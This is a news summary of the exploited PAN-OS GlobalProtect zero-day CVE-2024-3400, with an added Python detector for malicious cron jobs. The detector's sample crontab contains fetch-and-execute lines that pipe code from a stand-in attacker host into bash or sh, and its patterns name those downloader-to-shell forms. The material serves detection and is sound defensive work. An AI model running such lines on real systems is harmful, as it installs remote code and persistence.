
Palo Alto Networks patches GlobalProtect zero-day exploit


TLDR:

Pwning Palo Alto Networks! A critical vulnerability in PAN-OS software affects GlobalProtect gateways, allowing attackers to execute code remotely with root privileges. Exploited by threat actor UTA0218, the flaw dates back to March 2024. Mitigations and updates are being provided, with a fix expected by April 14.

Palo Alto Networks to Fix Exploited GlobalProtect Zero-Day

Palo Alto Networks has issued a critical alert for a vulnerability in its PAN-OS software used in firewall-VPN products. The flaw, CVE-2024-3400, has a severity score of 10 out of 10 and can be exploited by attackers to take control of affected gateways remotely. The vulnerability affects GlobalProtect gateways on PAN-OS 10.2, 11.0, and 11.1 configurations with device telemetry enabled.

Zero-day exploitation of the vulnerability was detected by cybersecurity firm Volexity, with the threat actor identified as UTA0218. The attacker could create a reverse shell, download tools onto the device, and export configuration data to move laterally within organizations. Initial intrusion methods involved configuring a cron job to retrieve payloads from an attacker-controlled URL and execute commands.
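The cron-based persistence described above is something defenders can hunt for on any Linux-based host. The following is an added example, not code from Palo Alto Networks or Volexity: it flags crontab entries that download content from a URL and hand it straight to an interpreter. The sample crontab, host names and file paths are constructed for illustration.

```python
import re
from urllib.parse import urlparse

FETCH = r"(?:wget|curl)\b"
SHELL = r"(?:ba|da|z)?sh\b|python3?\b|perl\b"
# downloader whose output is piped into an interpreter: wget ... | bash
PIPE_TO_SHELL = re.compile(rf"\b{FETCH}[^|;&]*\|\s*(?:\S*/)?(?:{SHELL})")
# interpreter fed by command substitution: sh -c "$(curl ...)" or backticks
SUBST = re.compile(rf"\b(?:{SHELL})[^|;&]*(?:\$\(|`)\s*(?:\S*/)?{FETCH}")
URL_RE = re.compile(r"https?://[^\s'\"|;)]+", re.I)
SCHEDULE_RE = re.compile(r"^(@\w+|(\S+\s+){4}\S+)\s+(.*)$")

def cron_command(line, has_user_field=True):
    """Return the command part of a crontab line, or None for non-job lines."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
        return None  # blank line, comment, or environment assignment
    m = SCHEDULE_RE.match(line)
    if not m:
        return None
    cmd = m.group(3)
    if has_user_field:  # /etc/crontab and /etc/cron.d carry a user column
        parts = cmd.split(None, 1)
        cmd = parts[1] if len(parts) == 2 else ""
    return cmd

def scan_crontab(text, has_user_field=True):
    """Return (line_number, [hosts]) for jobs that fetch and execute remote content."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = cron_command(line, has_user_field)
        if cmd and (PIPE_TO_SHELL.search(cmd) or SUBST.search(cmd)):
            hosts = sorted({h for u in URL_RE.findall(cmd) if (h := urlparse(u).hostname)})
            findings.append((n, hosts))
    return findings

SAMPLE = """\
# constructed sample in /etc/cron.d format (user column present)
MAILTO=root
*/5 * * * * root /usr/local/bin/rotate-logs.sh
0 2 * * * root curl -s https://status.example.org/health | grep -q ok
* * * * * root wget -qO- http://payload.example.invalid/policy | bash
@reboot root /bin/sh -c "$(curl -fsSL http://payload.example.invalid/u)"
"""

if __name__ == "__main__":
    for line_no, hosts in scan_crontab(SAMPLE):
        print(f"line {line_no}: fetch-and-execute job contacting {hosts}")
```

The check covers only single-command fetch-and-execute jobs; a job that saves a file in one step and runs it in another needs separate review of the script it calls.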

Palo Alto Networks, referring to the exploitation as Operation MidnightEclipse, has provided mitigations and a hotfix for the vulnerability. Customers are urged to implement the mitigations and temporarily disable device telemetry until the permanent fix is applied. The company is actively notifying customers and working to address the issue promptly.

Overall, the article highlights the severity of the vulnerability, the exploitation by threat actor UTA0218, the measures Palo Alto Networks is taking to address the issue, and the importance of immediate action by customers to secure their systems.
